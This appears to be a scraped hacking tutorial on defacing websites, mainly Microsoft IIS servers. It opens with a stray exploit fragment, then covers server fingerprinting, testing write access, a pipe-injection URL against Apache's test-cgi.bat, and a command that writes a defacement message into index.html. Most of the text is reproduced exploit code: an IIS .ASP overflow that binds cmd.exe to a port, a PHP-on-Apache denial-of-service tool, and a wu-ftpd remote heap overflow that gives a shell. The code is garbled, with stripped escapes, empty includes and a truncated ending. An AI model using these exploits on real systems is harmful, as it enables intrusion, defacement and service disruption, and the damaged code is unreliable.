StringBuffer snd=new StringBuffer("site exec "+buf2+" AAAAn");
dosend(snd.toString());
buf2=new StringBuffer("");
//fill buffer with nops
for(int i=0;i!=480-sclength-1;i++)
buf2.append((char)0x90);
//add chunks
Written by Canakar
--------------------------------------------------------------------------------
Defacing websites is one of the most happening topic in today s IT world.
Crackers, Script Kiddies and some times hackers pave their path towards
fame by defacing websites. In most cases websites are defaced either to
spread a message among public or for fun or some other reasons.. not to mention here !!
in this article I ll explain most of the intricacies of website defacements.
Generally websites are defaced by exploiting known vulnerabilities in web
servers and gaining root shell or injecting malicious coded into the target
page residing on the server. In this manual I ll mainly describe the methods
of exploiting vulnerable Microsoft IIS web server. Though Apache is another
popular web server which is much more secure but I think I don t know much
about defacing a website hosted in Apache. But I ll try to write a theoretical
explanation of Apache servers.
This article is mainly divided into the following parts :
? Web server software detection.
? Analyzing web server configurations.
? Checking for known vulnerabilities.
? Coding exploits.
? Exploiting known vulnerabilities for Breaking into the server.
? Injecting malicious code through URL.
? Keeping yourself safe.
? Last Notes.
Web Server Detection
Defacing websites is not at all hacking. It doesn t need a hacker s brain, or a hacker s genius.
All it needs is looking for exploits, good deal of programming skill and plenty of time for
trial and error. Basically in every software there exists some vulnerabilities
(mistakes in programming) exploiting which one can get root (administrator privileged)
access to the system running that particular vulnerable software. Using this concept
websites are defaced. You can find a lots of recently discovered vulnerabilities in websites
like http://www.securityfocus.com , http://www.packetstormsecurity.com
, http://www.securiteam.com etc. some of these sites even offer exploit codes.
But before you look for exploits or vulnerabilities in those sites you need to know
which server software is running by your target website. After knowing the server
software, then only you have to look for vulnerabilities and exploits corresponding
to that particular software.
Web server detection is quite an easy but obvious method. Basically what happens
when a request is send to a web server which compelled it to generate a 400 bad request
error message, or a 200 OK message or a 404 forbidden error message in raw mode
(that is through telnet) then the server software responds with the corresponding
message which contains its web server software along with version info. So what we
need to do is just telnet into the port 80 (default port for web servers) of a web
server and send some request so that the server responds with a 400 bad request error
message or a 200 OK message which will contain the server software and version info.
Microsoft Telnet>telnet 127.0.0.1 80
GET HTTP/1.1rnrn
Host:server-software
HTTP/1.1 403 Forbidden
Date: Sat, 10 Aug 2002 16:55:41 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1
403 Forbidd<br />en
Forbidden
You don't have permission to access /
on
this server.
Apache/1.3.22 Server at www.apache.org Port 80
RESS>
Connection to host lost.
Oki I hope you got it. its quite simple. In brief what you need to do is just telnet in to
port 80 of your target website (you can even telnet to the domain name ie. telnet
hackersclub.up.to 80) type in some requests like GET HTTP/1.1rnrn then type
something like Host:server-software then press quite a few times until you
get the server s response. The server will respond with its software info.
ANALYZING WEB SERVERS
Basically a default IIS (Internet Information Service) installation contains the website root at c:Inetpubwwwroot. Basically all the directories inside the directory c:Inetpub (in case of IIS and c:apache groupapachehtdocs for win32 version of Apache). All the folder inside it are regarded as Virtual Directories. In a web server each virtual directory are provided with different type of permissions. Permissions like Read, Write, Execution of Scripts, Execution of Executable like dll and server side pages like ASP, cgi etc., Directory Browsing.
In here I am going to describe the methods of analyzing the directory permission of a virtual directory residing in a web server.
Read Access : Whenever you visit a website by writing the websites domain name into your web browser then what actually happens is that you are connected to port 80 (default HTTP port) of the IP address associated with the domain name. Say the IP address of yahoo.com is 203.197.102.78. so when you write http://www.yahoo.com in your web browser address bar then what happens is that this URL (Uniform Resource Locator) is resolved to http://203.197.102.78:80/index.html (or index.htm, index.asp ,default.asp, index.jsp, default.jsp, /, default.php or whatever configured as the index page in the webserver). Now on type the URL you will be taken to the yahoo s website where you will be able to read contents from its wwwroot. If it contains executables like ASP or JSP or PHP , then those server side pages are executed and HTML is generated and passed to the browser (client) by IIS (server) or any web server dynamically. Now when you can read a document from a given directory then it indicates that the directory is readable. Basically directories containing data bases files are prohibited with read access for security reasons.
Note : if you are a real newbie who don t know about IP addressing then read my article on tracing IP to form a brief idea on IP addressing.
Write Access: As I have always suggested the members of my website to go through the RFC (request for comments) on important protocols like HTTP (Hyper Text Transfer Protocol), TELNET, FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol) etc, those who have read the RFC on HTTP would definitely know what is the meaning of write access in a web server. For those who haven t come across the HTTP RFC, I should give a brief description about the HTTP protocol. HTTP is a part of the TCP/IP stack (correct me if I am wrong). It was designed and developed with the intension of sharing files across the internet as it obvious from the name as HTTP stands for Hyper Text Transfer Protocol. Initially files can be uploaded and downloaded from the server according to the HTTP protocol without the need of any type of authentication. Soon it was realized that this kind of architecture is a real security threat cause anybody with half brains can have write access to a particular server. Now what was done is that web servers are designed and configured as such to give write access to only selected virtual directories.
Try telnet in to a website and play around with it to get some practical information about the servers and their behaviors. Here s a list of commonly used commands supported by a web serve according to RFC of HTTP.
GET : used to send request for read access to a file residing on the server by the browser (client)
Example :
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
GET /index.html HTTP/1.1rnrn
Output:
The HTML source of the index.html page residing on the server will be returned or if requested for an ASP or JSP or any server side executable page.. then the dynamically generated HTML will be displayed.
PUT : used to create a file on the server.. requires write access on the specified virtual directory where the file is to be created..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PUT /analyzing.txt HTTP/1.1rnrn
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
DEL : for deleting a page on the webserver.. requires write access on the specified virtual directory where the file is to be deleted..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
del /index.html HTTP/1.1rnrn
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
ECHO : the printing tool.. same as used in DOS Batch Files.. The output can be redirected..
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
ECHO defaced by Abhisek Datta >> /index.html HTTP/1.1rnrn
PROPFIND : used as a request for directory browsing..(for IIS.. actually its an administrative tool used for web server analysis)
Example:
Microsoft Telnet>telnet astalavista.com 80
Connected to astalavista.com
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0
Output :
Most probably or better to say definitely you will get a 403 Forbidden Error.. as it is obvious that the wwwroot will never have write access..
To test the write access permission for a directory in Microsoft IIS in a little advanced way. Follow the method follows :
To test if write permission is enabled for anonymous web clients telnet into the web server port usually TCP port 80 and make the following request:
PUT /scripts/abhisek.asp HTTP/1.1
Host: iis-server
Content-Length: 10
At this stage the server should respond with a 100 Continue message.
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
On receiving this type 10 letters
AAAAAAAAAA
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
If the server responds with this 201 Created response then the write permission is enabled.
Execution Access : Server side pages (ASP, JSP, PHP) ,dll (dynamic link libraries) etc often used in today s highly advanced database driven dynamic websites which dynamically generates the HTML and send it to the client (browser). These server side pages and other executables including dll and exe files needs execution privileges in the virtual directory where they are kept. Generally all the dll , asp, exe files which needs execution privileges are kept in a single virtual directory.
Directory Browsing : Often web servers (or to be more specific.. virtual directories of a web server) are configured as such to provide directory browsing access to all clients or special clients through proper authentications. Basically directory browsing means you can list the files and folders present in your specified virtual directory just as you see in your computer. For security reasons most of the production level websites turn of this feature. But exploits can be used to get a directory listing of a virtual directory.
Exploit for Directory Listing in Apache (win32) :
One of the most preferred web server Apache (win32) 2.1.x (I am not sure about the version) by default contains a .bat file named test-cgi.bat in its cgi-bin directory. It was actually provided so that system administrators can test the privileges of cgi-bin directory which contains all the cgi and perl script. Obviously this cgi-bin virtual directory has execution permission. This conditions are exploited to perform out attack. Basically when a .bat file in win32 version of Apache web server is called for execution a DOS (Disk Operating System) shell is spawned to it for execution. Now we can use | (pipe) character along with the batch file call name to execute commands on the remote server. The attack URL will be something like this :
http://www.target.com/cgi-bin/test-c...shttpd.c onf
So by this attack URL what I have done is copied the httpd.conf file from the conf directory which hardly has read access to the Apache web root ie. htdocs virtual folder. Now we can easily download the httpd.conf file using the URL http://target.com/httpd.conf since now it resides in the apache web root.
Note: For those who are not acquainted with Apache and don t know what httpd.conf file is Well in Apache you have to configure you entire web server using commands and scripts which are kept in httpd.conf file in c:apache groupapacheconf folder of default apache installation on a typical windows system. This file contains all the settings of the target web server and by some how if we can manage to get our hands on this file then we can have clear idea about all the settings of the web server including the location of log files, directory permissions, write access, authentication levels etc etc.
CHECKING FOR KNOWN VULNERABILITY
Mostly websites are defaced and hacked using vulnerabilities associated with the server software or the Operating System running the server software. Most of the so called hackers deface websites using the vulnerabilities found by peoples who deserve being called Hackers . I guess you must be knowing what a vulnerability is. Its actually an existing flaw in the software architecture which will allow a hacker or a malicious cracker to take control over the system or issue arbitrary system commands to the server. There are a hell of of vulnerabilities exists in almost all softwares. Basically in old days I have heard that hackers used to find out flaw and vulnerabilities in softwares by their own. But today I guess there are very few peoples who does so. There are so many good sites like :
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
these sites contains more than enough latest vulnerabilities which will help you getting
started. Even if you are experienced I am sure you ll get a lot of help from these sites.
CODING EXPLOITS :
Say you are targeting to hack the website http://www.anisurrahman.net
(goss!! Anisur will kick my ass if he read this article).
Using the methods described above you can easily find that the website
is running on Microsoft IIS 5.00 server software.
Now the time is to look for exploits (I am considering you not to be a
hacker who can find his own vulnerabilities.. if you do so.. you don t need to
read this article.). even if you find some overflow or malloc vulnerability in
the web server software from the above mentioned sites you need to write programs
(generally in C or Perl) to implement the exploit for the said vulnerability.
For this definitely you need to have a very good knowledge about programming
with Socket Coding background. If if you cant code you own exploits you can
download exploits coded in languages like C , Perl , JAVA (rarely).
But hey if you download a great exploit which claims to get you root shell
on the target web server written in C, then while compiling it I am sure you ll
find a lot of errors cause C syntaxes and functions differs somewhat from compiler
to compiler. Now you will realize the need for quite a lot programming background
with pretty good knowledge of programming.
Here s a list of some known vulnerabilities and exploits coded for it :
1. This .ASP overflow exploit will open port 1111 and bind the cmd.exe to it.
It should be noted is that every time you run this exploit and a message will
show that this exploit works perfectly. However, that does not mean you can get
the access to the target host, the reason is that on some occasions there will
be a message-box appear on victim's terminal screen showing that an AV (Access Violation
) has occurred.
/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
keji@chinansl.com
use MS VC++ to compile this piece of code
*/
#include "stdafx.h"
#include
#include
#include
#include
#pragma comment (lib,"Ws2_32")
int main(int argc, char* argv[])
{
if(argc != 4)
{
printf("%s ip port aspfilepathnn",argv[0]);
printf(" ie. %s 127.0.0.1 80 /iisstart.aspn",argv[0]);
puts(" programed by keji@chinansl.com");
return 0;
}
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"x1cxfbxe6x01"; //"x0cxfbxe6x01";
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad="xccxccxccxcc" "ADPA" "x02x02x02x02" "PADP"; //16 bytes
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
{
puts("WSAStartup() error");
return -1;
}
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts("Socket create error");
return -1;
}
if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts("Cannot connect to the specified host");
return -1;
}
char buff[4096];
char* shellcode="x55x8bxecx33xc0xb0xf0xf7xd8x0 3xe0x8bxfcx33xc9x89"
"x8dx2cxffxffxffxb8x6bx65x72x6exabxb8 x65x6cx33x32"
"xabx32xc0xaaxb8x77x73x6fx63xabxb8x6b x33x32x2exab"
"x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2e xabx32xc0x4f"
"xaaxb8x23x80xe7x77x8dx9dx10xffxffxff x53xffxd0x89"
"x45xfcxb8x23x80xe7x77x8dx9dx19xffxff xffx53xffxd0"
"x89x45xf8xbbx4bx56xe7x77x6ax47xffx75 xfcxffxd3x89"
"x45xf4x6ax48xffx75xfcxffxd3x89x45xf0 x33xf6x66xbe"
"x1dx02x56xffx75xfcxffxd3x89x45xecx66 xbex3ex02x56"
"xffx75xfcxffxd3x89x45xe8x66xbex0fx03 x56xffx75xfc"
"xffxd3x89x45xe4x66xbex9dx01x56xffx75 xfcxffxd3x89"
"x85x34xffxffxffx66xbexc4x02x56xffx75 xfcxffxd3x89"
"x85x28xffxffxffx33xc0xb0x8dx50xffx75 xfcxffxd3x89"
"x85x18xffxffxffx6ax73xffx75xf8xffxd3 x89x45xe0x6a"
"x17xffx75xf8xffxd3x89x45xdcx6ax02xff x75xf8xffxd3"
"x89x45xd8x33xc0xb0x0ex48x50xffx75xf8 xffxd3x89x45"
"xd4x6ax01xffx75xf8xffxd3x89x45xd0x6a x13xffx75xf8"
"xffxd3x89x45xccx6ax10xffx75xf8xffxd3 x89x45xc8x6a"
"x03xffx75xf8xffxd3x89x85x1cxffxffxff x8dx7dxa0x32"
"xe4xb0x02x66xabx66xb8x04x57x66xabx33 xc0xabxf7xd0"
"xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfe xc8xabx33xc0"
"xabx40xabx8dx45xb0x50x33xc0x66xb8x01 x01x50xffx55"
"xe0x33xc0x50x6ax01x6ax02xffx55xdcx89 x45xc4x6ax10"
"x8dx45xa0x50xffx75xc4xffx55xd8x6ax01 xffx75xc4xff"
"x55xd4x33xc0x50x50xffx75xc4xffx55xd0 x89x45xc0x33"
"xffx57x8dx45x8cx50x8dx45x98x50x8dx45 x9cx50xffx55"
"xf4x33xffx57x8dx45x8cx50x8dx45x90x50 x8dx45x94x50"
"xffx55xf4xfcx8dxbdx38xffxffxffx33xc9 xb1x44x32xc0"
"xf3xaax8dxbdx38xffxffxffx33xc0x66xb8 x01x01x89x47"
"x2cx8bx45x94x89x47x38x8bx45x98x89x47 x40x89x47x3c"
"xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50 x8dx85x38xff"
"xffxffx50x53x53x53x6ax01x53x53x8dx4d x80x51x53xff"
"x55xf0x33xc0xb4x04x50x6ax40xffx95x34 xffxffxffx89"
"x85x30xffxffxffx90x33xdbx53x8dx85x2c xffxffxffx50"
"x53x53x53xffx75x9cxffx55xecx8bx85x2c xffxffxffx85"
"xc0x74x49x33xdbx53xb7x04x8dx85x2cxff xffxffx50x53"
"xffxb5x30xffxffxffxffx75x9cxffx55xe8 x85xc0x74x6d"
"x33xc0x50xffxb5x2cxffxffxffxffxb5x30 xffxffxffxff"
"x75xc0xffx55xccx83xf8xffx74x53xebx10 x90x90x90x90"
"x90x90x6ax32xffx95x28xffxffxffxebx99 x90x90x33xc0"
"x50xb4x04x50xffxb5x30xffxffxffxffx75 xc0xffx55xc8"
"x83xf8xffx74x28x89x85x2cxffxffxffx33 xc0x50x8dx85"
"x2cxffxffxffx50xffxb5x2cxffxffxffxff xb5x30xffxff"
"xffxffx75x90xffx55xe4x85xc0x74x02xeb xb4xffx75xc4"
"xffx95x1cxffxffxffxffx75xc0xffx95x1c xffxffxffx6a"
"xffxffx95x18xffxffxff";
char* s1="POST ";// HTTP/1.1rn";
char* s2="Accept: */*rn";
char* s4="Content-Type: application/x-www-
form-urlencodedrn";
char* s5="Transfer-Encoding:
chunkedrnrn";
char* sc="0rnrnrn";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1rn%sHost: %srn%s%s10rn%srn4rnAAAArn4rnBBBBrn%s ", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);
int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts("Send shellcode error!");
return -1;
}
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"") != NULL)
{
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
}
shutdown(s,0);
closesocket(s);
printf("nUse to connect to the hostn",destIP);
puts("If you cannot connect to the host,try run this program again!");
return 0;
}
------------------------------------------------------------------------
2.
/* PHP-APACHE.C
* By Matthew Murphy
* Exhaust CGI Resources via PHP on Apache
*
* Calling PHP with no parameters causes it to
* never terminate; the process must be killed
* by the server, the OS, or the admin.
*
* PHP on Apache requires you to configure a
* virtual to load PHP out of. PHP implements
* a "cgi.force_redirect" value to require that
* a certain environment variable be set to
* allow PHP to run further.
*
* However, an empty command-line *still* will
* cause PHP to hang. If a remote user does
* this for a lengthy amount of time, the server
* may no longer launch PHP or other server-side
* components.
*
* NOTE: The vulnerable config is on Apache,
* but other servers can still be exploited
* if they offer PHP.EXE (or an SAPI) directly.
*
* Usage: php-apache [phpbin] [port] [maxsocks]
*/
#include
#include
#ifdef _WIN32
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors */
#include /* WinSock API calls... */
#define WSA_VER 0x0101 /* WinSock ver. to use */
#pragma comment(lib, "wsock32.lib") /* Check your compiler's docs... */
#else
#include
#include
#include
#include
#include
#include
#include
#endif
#define DEF_PHP "/php/php" /* This is used as the PHP
* path if one isn't set
*/
static char php_buf[] = "GET %s HTTP/1.0x0dx0ax0dx0a";
void main(int argc, char *argv[]) {
char host[257];
char binpath[257];
int maxsocks;
char request[300];
unsigned short port;
struct hostent *he;
struct sockaddr_in sa_in;
#ifdef _WIN32
WSADATA wsa_prov;
SOCKET s;
#else
int s;
#endif
printf("PHP-APACHE.C by Matthew Murphyx0dx0a");
printf("Exhausting CGI resources w/ PHP on Apachex0dx0ax0dx0a");
maxsocks = 0;
strcpy(&binpath[0], DEF_PHP);
#ifdef _WIN32
if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
printf("ERROR: Windows Sockets init failed!");
exit(1);
}
#endif
port = (unsigned short)htons(80);
switch (argc) {
case 5:
maxsocks = atoi(argv[4]);
case 4:
port = htons((unsigned short)atoi(argv[2]));
case 3:
if (strlen(argv[2]) > 256) {
printf("ERROR: 256 char path limit exceeded in 'phpbin' argument.");
exit(1);
}
strcpy(&binpath[0], argv[2]);
case 2:
if (strlen(argv[1]) > 256) {
printf("ERROR: No host should be over 256 chars!");
exit(1);
}
strcpy(&host[0], argv[1]);
break;
default:
printf("Usage: php-apache [port] [maxsocks] [phpbin]x0dx0ax0dx0ahost - The IP/DNS name to attackx0dx0aport - The port the HTTP service normally runs on (default: 80)x0dx0amaxsocks - The maximum number of connections to establish (creates a finite flood). A zero value means continue until termination (default: 0)x0dx0aphpbin - The virtual path to the PHP binary (e.g, /php/php[.exe]; default: /php/php)");
exit(0);
}
if (maxsocks == 0) {
maxsocks--;
}
sa_in.sin_family = AF_INET;
sa_in.sin_port = (unsigned short)port;
he = gethostbyname(&host[0]);
if (he == NULL) {
printf("ERROR: DNS resolution failed, or unknown host.");
exit(1);
}
#ifdef _WIN32
sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#else
sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long *)he->h_addr;
#endif
sprintf(&request[0], &php_buf[0], &binpath[0]);
while (!maxsocks == 0) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Couldn't create socket...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
if (!connect(s, (const struct sockaddr FAR *)&sa_in, sizeof(struct sockaddr_in)) == 0) {
printf("Couldn't connect...x0dx0aIf you continue to receive this error, terminate the program.");
} else {
send(s, (char FAR *)&request[0], strlen(&request[0]), 0);
/* If the exploit isn't using up server resources
* try removing this -- the server may be killing
* the CGI after a disconnect.
*/
#ifdef _WIN32
shutdown(s, SD_BOTH);
closesocket(s);
#else
close(s);
#endif
}
}
if (!maxsocks == -1) {
maxsocks--;
}
}
return;
}
------------------------------------------------------------------------
3. /*
* wu-ftpd 2.6.[0/1] remote heap overflow exploit
* wu-ftpd 2.5.* does also overflow and disconnect when you "cwd ~{"
* but it does not seem to be exploitable for some reason...
*
* Original Code by zen-parse
* This code was finished by CraigTM at 23-01-2002
*
* thanks to Krissa from #java@efnet for this:
* From the Integer API docs: Integer.parseInt("-FF", 16) returns -255
*
* thanks to dvorak for inspiring me; it works() now wink.gif
*
* This works (nearly) like zen-parses code, but gives you a shell...
*
* I wanted to challenge myself and prove that remote exploits can be
* done with java...(hello pr0ix!)...I also had way too much time wink.gif
*
* java woot [IP] {heap}
*
* CraigTM [ElectronicSouls]
*
* P.S.: I know that the Reader/Write class sucks, but it was done within minutes wink.gif
* P.P.S.:Have fun with the new targets wink.gif
*
*/
import java.io.*;
import java.net.*;
import java.util.*;
class woot
{
//type, got, inpbuf, string to check for (autodetect)
static String targets[] =
{
"RH7.0 - 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000", // by zen-parse
"08070cb0","08084600","2.6.1(1) WED AUG 9 05:54:50 EDT 2000",
"RH7.2 - wu-2.6.1-18 by kanix - verified by CraigTM", // doesnt seem to be
"08072af8","08085900","WU-2.6.1-18", // exploitable...
//"wu-2.6.1(2) by zen-parse", // zen-parse's common compile
//"0806ca48","0807e380","WU-2.6.1(2)", // seems useless in the wild
"wu-2.6.0(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806bae4","0807d600","WU-2.6.0(",
"wu-2.6.1(x) from www.wu-ftpd.org by CraigTM", //done by me
"0806c028","0807db40","WU-2.6.1(",
null
};
//socket stuff
static DataInputStream sin;
static PrintStream sout;
static Socket s = null;
//shellcode
static char sc[]={0x55,0x89,0xe5,0x31,0xc0,0x31,0xdb,0x31,0xc9,0xb 0,0x17,0xcd,0x80,0xb0,0x2e,0xcd,0x80,0xeb,0x43,0x5 e,0xb0,0x27,0x8d,0x5e,0x09,0xb1,0xed,0xcd,0x80,0x3 1,0xc9,0x31,0xc0,0xb0,0x3d,0xcd,0x80,0xba,0x2e,0x2 e,0x2f,0xff,0x8d,0x5d,0x04,0xb1,0x10,0x89,0x55,0x0 4,0x83,0xc5,0x03,0xe0,0xf8,0x89,0x4d,0x04,0xb0,0x3 d,0xcd,0x80,0x89,0xf3,0x89,0x75,0x08,0x89,0x4d,0x0 c,0xb0,0x0b,0x8d,0x4d,0x08,0x8d,0x55,0x0c,0xcd,0x8 0,0x31,0xc0,0xb0,0x01,0xcd,0x80,0xe8,0xb8,0xff,0xf f,0xff};
static int sclength=91;
//guess what?
static String victim="";
//your shell
static Thread reader, writer;
//vars
static int m=0;
static long tmp_got;
static long tmp_heap;
static long tmp_inpbuf;
void connect(String Server)
{
try
{
s = new Socket(Server, 21);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
}//try
catch (IOException e){System.out.println("Error Connecting:"+e);System.exit(-1);}
}//connect()
boolean allowsAnonymous()
{
String line=null;
try
{
connect(victim);
System.out.print(".");
boolean Ano=false;
if(s!=null)sout.println("USER planetsubhro");
System.out.print(".");
while(true)
{
if(s==null)break;
line=sin.readLine();
if(line==null)break;
if(line.indexOf("220")<=-1)
break;
line=line.toUpperCase();
for(int i=0;targets[i]!=null;i++)
{
if(line.indexOf(targets[i])>-1)
{
m=(i/4)+1;
break;
}
}
System.out.print(".");
if(s!=null)
{
sout.println("PASS sms1324");
sout.println("QUIT");
}
while(Ano==false)
{
line=sin.readLine();
if(s==null || line==null)break;
if(line.indexOf("331")>-1)
{
line=sin.readLine();
if(line==null || s==null)break;
}
if(line.indexOf("230")>-1)
return true;
if(line.indexOf("530")>-1 || line.indexOf("531")>-1)
return false;
}//while (Ano==false)
}//while(true)
//close socket again
if(s!=null)
{
try
{
s.close();s=null;sin=null;sout=null;
}
catch(IOException e){}
}
}//try
catch (IOException e){}
return false;
}//Anonymous check + get server
void shell()
{
reader.setPriority(6);
writer.setPriority(5);
reader.start();
writer.start();
Thread t = Thread.currentThread();
try {t.sleep(1000);} catch (InterruptedException e) {}
woot.sout.println("uname -a;id;");
}
void dosend(String s)
{
for(int i=0;i
{
if(s.charAt(i)==0xff)
sout.print(s.charAt(i));
sout.print(s.charAt(i));
}
}
void getTarget()
{
try
{
System.out.print("@@ Server>");
DataInputStream in = new DataInputStream (System.in);
victim=in.readLine();
}
catch (IOException e){}
}//getTarget()
boolean works(long n)
{
String v0=Long.toHexString(n);
String elements[]=new String[5];
elements[0]=v0.substring(0,2);
elements[1]=v0.substring(2,4);
elements[2]=v0.substring(4,6);
elements[3]=v0.substring(6,8);
for(int i=0;elements[i]!=null;i++)
{
if(elements[i].equals("00"))return false; //0x00 -> null byte
if(elements[i].equals("0a"))return false; //0x0a -> n
if(elements[i].equals("40"))return false; //0x40 -> @
}
return true;
}
boolean force()
{
char ok;
long l;
long got,inp;
long en=0+(256*1024);
long st=2048;
System.out.println("++ Option #"+m+" chosen.");
m=(m-1)*4;
System.out.println("++ Exploiting "+targets[m]+"n");
long tmp = Long.parseLong(targets[m+2],16);
st= st + tmp + Long.parseLong("6400", 16);
en= en + tmp + Long.parseLong("6400", 16);
got=Long.parseLong(targets[m+1],16);
inp=Long.parseLong(targets[m+2],16);
tmp_got=got-12;
tmp_inpbuf=inp+20;
System.out.println("got:t"+Long.toHexString(tmp_g ot+12)+"ninpbuf:t"+Long.toHexString(tmp_inpbuf-20));
System.out.println("brute forcing heap (from "+Long.toHexString(st)+" to "+Long.toHexString(en)+"):");
for(l=st;l
{
for(m=0;(m!=16&&m<32);m+=4)
{
if(works(m+l+st))
{
System.out.print(".");
tmp_heap=l+m;
if(exploit("scan"))
{
System.out.println("nheap:t"+Long.toHexString(tm p_heap)+"n");
System.out.println("nTrying to get shell...");
return true;
}
}
else // if(!works(m+l+st))
System.out.print("*");
}//for
}//for
return false;
}//force()
boolean exploit(String mode)
{
StringBuffer buf=new StringBuffer();
StringBuffer buf2=new StringBuffer("");
String got[] = new String[5];
String heap[] = new String[5];
String inpbuf[]=new String[5];
String hexgot = Long.toHexString(tmp_got);
String hexheap = Long.toHexString(tmp_heap);
String hexinpbuf = Long.toHexString(tmp_inpbuf);
//////////////////// PUT THE GOT ADDRESS ///////////////////////////
if(hexgot.length()==7)
{
got[0] = "0"+hexgot.substring(0,1);
got[1] = hexgot.substring(1,3);
got[2] = hexgot.substring(3,5);
got[3] = hexgot.substring(5,7);
}
if(hexgot.length()==8)
{
got[0] = hexgot.substring(0,2);
got[1] = hexgot.substring(2,4);
got[2] = hexgot.substring(4,6);
got[3] = hexgot.substring(6,8);
}
//////////////////// PUT THE HEAP ADDRESS ///////////////////////////
if(hexheap.length()==7)
{
heap[0] = "0"+hexheap.substring(0,1);
heap[1] = hexheap.substring(1,3);
heap[2] = hexheap.substring(3,5);
heap[3] = hexheap.substring(5,7);
}
if(hexheap.length()==8)
{
heap[0] = hexheap.substring(0,2);
heap[1] = hexheap.substring(2,4);
heap[2] = hexheap.substring(4,6);
heap[3] = hexheap.substring(6,8);
}
//////////////////// PUT THE INPBUF ///////////////////////////
if(hexinpbuf.length()==7)
{
inpbuf[0] = "0"+hexinpbuf.substring(0,1);
inpbuf[1] = hexinpbuf.substring(1,3);
inpbuf[2] = hexinpbuf.substring(3,5);
inpbuf[3] = hexinpbuf.substring(5,7);
}
if(hexinpbuf.length()==8)
{
inpbuf[0] = hexinpbuf.substring(0,2);
inpbuf[1] = hexinpbuf.substring(2,4);
inpbuf[2] = hexinpbuf.substring(4,6);
inpbuf[3] = hexinpbuf.substring(6,8);
}
//fill buffer with nops
for(int i=0;i!=480;i++)
buf2.append((char)0x90);
// fill the buffer with chunks. overwrites the syslog call pointer with
// address of our shellcode.
for(int l=0;l<460;l+=16)
{
buf2.setCharAt(l+0,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+1,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+2,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+3,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+4,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+5,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+6,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+7,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+8,(char)Integer.parseInt(got[3], 16));
buf2.setCharAt(l+9,(char)Integer.parseInt(got[2], 16));
buf2.setCharAt(l+10,(char)Integer.parseInt(got[1], 16));
buf2.setCharAt(l+11,(char)Integer.parseInt(got[0], 16));
buf2.setCharAt(l+12,(char)Integer.parseInt(inpbuf[3], 16));
buf2.setCharAt(l+13,(char)Integer.parseInt(inpbuf[2], 16));
buf2.setCharAt(l+14,(char)Integer.parseInt(inpbuf[1], 16));
buf2.setCharAt(l+15,(char)Integer.parseInt(inpbuf[0], 16));
}
buf.append("user ftpnpass http://mp3.com/cosv ");
